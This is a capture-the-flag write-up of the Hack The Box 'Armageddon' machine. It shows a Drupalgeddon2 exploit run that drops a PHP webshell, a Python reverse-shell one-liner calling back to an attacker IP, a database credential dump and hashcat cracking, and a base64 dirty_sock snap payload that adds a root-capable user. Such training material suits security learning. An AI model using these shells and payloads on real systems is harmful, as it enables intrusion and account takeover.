18th September 2021
Hack The Box Write-Up Armageddon by T13nn3s

Hack The Box Write-Up Armageddon – 10.10.10.233

It is not the monsters we should be afraid of; it is the people that don’t recognize the same monsters inside of themselves.

Shannon L. Alder

About Armageddon

In this post, I’m writing a write-up for the machine Armageddon from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Armageddon is an ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10, and submitting the root flag your points will be raised by 20.

Foothold
The initial port discovers two open ports. The first port is the default SSH 22/tcp port and the second is the default HTTP port 80/tcp. This machine is running a website on Drupal7. This version of Druap isn’t the latest version and it’s containing the Drupalgeddon2 vulnerability. After download the exploit we can directly running the exploit against Drupal7 to get access through a PHP webshell.

User
After having access to the webshell, we are able to create a reverse shell for our machine. Through the reverse shell, we are able to determine that Drupal7 is using a MySQL database to store the user account information. Through the configuration files of Drupal7, we can learn the username and password to access the MySQL database and dump the table which is containing the hashed passwords. Through hashcat, we are able to reverse those hashes an to a lateral movement from the user account apache to brucetherealadmin and then read the user flag.

Root
The user account brucetherealadmin has the permissions to run snapd install * command as sudo, without using a password. After some searching on the web, we can find an exploit named dirty_sock2 to exploit this vulnerability by installing a malicious snap payload to create a user account with elevated permissions to get root access to this machine.

Machine Info

Hack The Box Write-Up Armageddon by T13nn3s
Hack The Box Armageddon Write-Up by T13nn3s
Hack The Box Armageddon Machine IP and maker
Hack The Box Armageddon Machine IP and maker

Reconnaicanse

Port scan

As always we start the machine with a port scan with Nmap.

~$ nmap -sC -sV -oA ./nmap/10.10.10.233 10.10.10.233

The results.

Starting Nmap 7.90SVN ( https://nmap.org ) at 2021-04-28 21:11 CEST
Nmap scan report for 10.10.10.233
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.01 seconds

The port scan discovered two open ports. The first port is the default SSH port 22/tcp. The second port is the default HTTP port 80/tcp. From the output, we can see that this webserver is running Drupal 7 and we can find some web directories.

Enumeration Web Server

Let’s start with the enumeration with the webserver. We can first start the web directory brute-forcing with fuff. We know we can find other interesting directories or files.

~$ ffuf -c -w ../../wordlists/wfuzz/general/big.txt -u http://10.10.10.233/FUZZ
 

         /'___\  /'___\           /'___\       
        /\ \__/ /\ \__/  __  __  /\ \__/       
        \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
          \ \_\   \ \_\  \ \____/  \ \_\       
           \/_/    \/_/   \/___/    \/_/       
 

        v1.2.0-git
 ________________________________________________
 

 :: Method           : GET
 :: URL              : http://10.10.10.233/FUZZ
 :: Wordlist         : FUZZ: ../../wordlists/wfuzz/general/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 _______________________________________________
 

cgi-bin/                [Status: 403, Size: 210, Words: 15, Lines: 9]
includes                [Status: 301, Size: 237, Words: 14, Lines: 8]
misc                    [Status: 301, Size: 233, Words: 14, Lines: 8]
scripts                 [Status: 301, Size: 236, Words: 14, Lines: 8]
sites                   [Status: 301, Size: 234, Words: 14, Lines: 8]
:: Progress: [3024/3024] :: Job [1/1] :: 332 req/sec :: Duration: [0:00:12] :: Errors: 0 ::

We visit the website through URL http://10.10.10.233. We are ending up on the webpage shown below.

Hack The Box Armageddon website
http://10.10.10.233

The name of this machine is Armageddon and we have a website running on Drupal 7. This cannot be a coincidence; it has to be something to do with Drupalgeddon. Before we dive into the Drupalgeddon vulnerabilities, let’s first check which version of Drupal 7 is running on this machine. For that, we can check the CHANGELOG.txt file on location http://10.10.10.233/CHANGELOG.txt. Let’s do a curl request to this file to read the contents.

~$ curl 10.10.10.233/CHANGELOG.txt

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.

Drupal 7.55, 2017-06-07
-----------------------
- Fixed incompatibility with PHP versions 7.0.19 and 7.1.5 due to duplicate
  DATE_RFC7231 definition. 
...

This machine is running Drupal 7.56 from 2017. As it’s now 2021 this version of Drupal is very outdated. Let’s check which vulnerability can be used for this version of Drupal.

~$ searchsploit Drupal
...
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                     | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)              | php/webapps/44542.txt 
...

There is a vulnerability found for this version of Drupal. As we already thought, this vulnerability has the name Drupalgeddon3. There are more versions of Drupalgeddon, the first one was discovered back in 2014, which was a SQL Injection vulnerability (CVE-2014-3704).

Exploitation

Drupalgeddon2 – CVE-2018-7600

There is a Metasploit module available for this exploit. There is nothing wrong with Metasploit, but for the OCSP exam, you’re not allowed to use Metasploit. Whatever I think about that, I respect that rule and because I’m also learning for OCSP, I deliberately don’t use Metasploit. So, let’s copy the Python PoC to our working directory.

~$ searchsploit -m exploits/php/webapps/44448.py
   Exploit: Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
        URL: https://www.exploit-db.com/exploits/44448
          Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/44448.py
File Type: a /usr/bin/env script text executable, ASCII text, with CRLF line terminators

Copied to: /Users/T13nn3s/htb/machines/armageddon/44448.py 

Let’s start this exploit.

~$ python 44448.py
################################################################
# Proof-Of-Concept for CVE-2018-7600
# by Vitalii Rudnykh
# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders
# https://github.com/a2u/CVE-2018-7600
################################################################
Provided only for educational or information purposes

Enter target url (example: https://domain.ltd/): 'http://10.10.10.233/'
Not exploitable

This is not what I expected. For some reason this script is nog working. There is also a Ruby script. Let’s jump over to that one. First, we need to copy this exploit to our working directory.

~$ searchsploit -m exploits/php/webapps/44449.rb
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/local/opt/exploitdb/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script text, ASCII text, with CRLF line terminators

Copied to: /Users/madij/htb/machines/armageddon/44449.rb

Ok, now launch the exploit.

~$ ruby 44449.rb http://10.10.10.233

Houston, we have a problem!

I’m running are working from a Macbook. On running this payload, I got this error below:
Traceback (most recent call last):
2: from 44449.rb:16:in `<main>'
1: from /System/Library/(...)rubygems/core_ext/kernel_require.rb:54:in `require'

/System/Library/(...)/rubygems/core_ext/kernel_require.rb:54:in `require': cannot load such file -- highline/import (LoadError)

This can be fixed by installing the highligt gem, by running this command:
gem install highline

It’s working! We have a webshell!

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.233/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo FNVRWPMP
[+] Result : FNVRWPMP
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> hostname
armageddon.htb
armageddon.htb>> whoami
apache 

Reverse shell as apache

We can now proceed to the next step. With this webshell we cannot browse through the directories, we need to create a reverse shell. We can use Python to create a webshell. So, we set our listener on port 4444. We can now start this payload to establish a reverse shell.

armageddon.htb>> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.150",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

We got now a reverse shell. Our current user account does not have the proper permissions to list files and directories on system level, so we need to move lateral to the next user account which has more privileges on this machine.

Lateral Movement

From apache to brucetherealadmin

Let’s check in the file /var/www/html/sites/default/settings.php to learn more about the database connection from Drupal.

sh-4.2$  cat /var/www/html/sites/default/settings.php
...
$databases = array (                                                                                                                                                                     
   'default' =>
   array (
     'default' =>
     array (
       'database' => 'drupal',
       'username' => 'drupaluser',
       'password' => '[email protected]*m23gBVj',
       'host' => 'localhost',
       'port' => '',
       'driver' => 'mysql',
       'prefix' => '',
    ),
  ),
);
...

Drupal is using MySQL database with the database name drupal. We also have now the login credentials for the MySQL database. Let’s make a connection to the database drupal and get a list of all tables. We need to find the table which is holding the user accounts.

sh-4.2$ mysql -u drupaluser [email protected]*m23gBVj -e "use drupal;show tables;"
...
url_alias
users
users_roles
variable
watchdog 

So, there is a table names users. Let’s get the contents of this table.

sh-4.2$ mysql -u drupaluser [email protected]*m23gBVj -e "use drupal;select * from users"                                                                                                       
uid     name    pass    mail    theme   signature       signature_format        created access  login   status  timezone        language        picture init    data                     
 0        NULL    0          0           0            0                         NULL                              0                             NULL                                                             
 1        brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt [email protected] filtered_html 1606998756 1607077194      160707627
 6       1       Europe/London           0       [email protected]     a:1:{s:7:"overlay";i:1;}                                                                                         
 3       t13nn3s $S$DbM397m15.cSfLtc422sfbYDDFtts3kCx/QheWytbVFLed24Yn9r [email protected]                  filtered_html   1619898610      0       0       0       Europe/London   0
 [email protected]  NULL 

Nice! We have now two user accounts and hashed passwords. The first user account is brucetherealadmin and the second is admin. Those hashes are Drupal7 hashes and hashcat can crack those hashes. We can place both of the hashes in a file called mysql-hashes and let’s spin up hashcat.

~$ hashcat -a 0 -m 7900 mysql-hashes ../../wordlists/rockyou.txt 
hashcat (v6.1.1) starting... 

OpenCL API (OpenCL 1.2 (Feb 28 2021 03:51:16)) - Platform #1 [Apple]
====================================================================
* Device #1: Intel(R) Core(TM) i7-7820HQ CPU @ 2.90GHz, skipped
* Device #2: Intel(R) HD Graphics 630, 1472/1536 MB (384 MB allocatable), 24MCU
* Device #3: AMD Radeon Pro 560 Compute Engine, 4032/4096 MB (1024 MB allocatable), 16MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Uses-64-Bit
* (null)

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #3: Skipping hash-mode 7900 - known CUDA/OpenCL Runtime/Driver issue (not a hashcat issue)
             You can use --force to override, but do not report related errors.
Host memory required for this attack: 116 MB
 

Dictionary cache built:
* Filename..: ../../wordlists/rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921525
* Keyspace..: 14344387
* Runtime...: 2 secs 

 $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo 

The first hash is cracked. We got the password booboo. Let’s try to access this machine through SSH with the user account brucetherealadmin.

~$ ssh [email protected] 
[email protected]'s password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[[email protected] ~]$ ls
user.txt
[[email protected] ~]$ cat user.txt
3a734456e236468bb03ab0aad8fb1282

We have access to the machine with SSH and we are able to read the user flag.

Privilege Escalation

Enumeration

First let’s check which permissons this user account has.

[[email protected] ~]$ sudo -l
 Overeenkomende standaarditems voor brucetherealadmin op armageddon:
     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
     USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 
Gebruiker brucetherealadmin mag de volgende opdrachten uitvoeren op armageddon:
     (root) NOPASSWD: /usr/bin/snap install * 

After a quick search on the web, we can find a local privilege escalation with the name Dirty Sock. On GitHub, we can find this exploit: https://raw.githubusercontent.com/initstring/dirty_sock/master/dirty_sockv2.py. Let’s download this payload to the /tmp folder on the Armageddon machine.

[[email protected] tmp]$ curl 10.10.16.150/dirty_sock2.py -o dirty_sock2.py
   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
100  8696  100  8696    0     0  14602      0 --:--:-- --:--:-- --:--:-- 14590 

Let’s execute the payload. I had first to write the base64 payload with echo, but after several errors I decide to do it with Python.

[[email protected] tmp]$ python -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > /tmp/payload.snap

After placing the payload in the /tmp folder, we can execute this payload.

[[email protected] tmp]$ sudo /usr/bin/snap install --devmode /tmp/payload.snap
 dirty-sock 0.1 installed 

Now, we can switch to the use account dirty_sock. We can check the permissions of this account and it has full sudo permissions on this machine to run everything as root.

[[email protected] ~]$ sudo -l
 Matching Defaults entries for dirty_sock on armageddon:
     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
     USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 

 User dirty_sock may run the following commands on armageddon:
     (ALL : ALL) ALL
 [[email protected] ~]$  

Last thing to do, read the user flag 🙂

[[email protected] tmp]$ su - dirty_sock
Password: 
[[email protected] ~]$ sudo cat /root/root.txt
7edc756222558e23af9712cde162a9d9 

We have rooted this machine! it was a nice and easy machine. It was a lot of fun rooting this machine. So, respect for the creator! Did you like this write-up? Please consider spending a respect point, my HTB profile: https://app.hackthebox.eu/users/224856.

Happy Hacking! 🙂

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *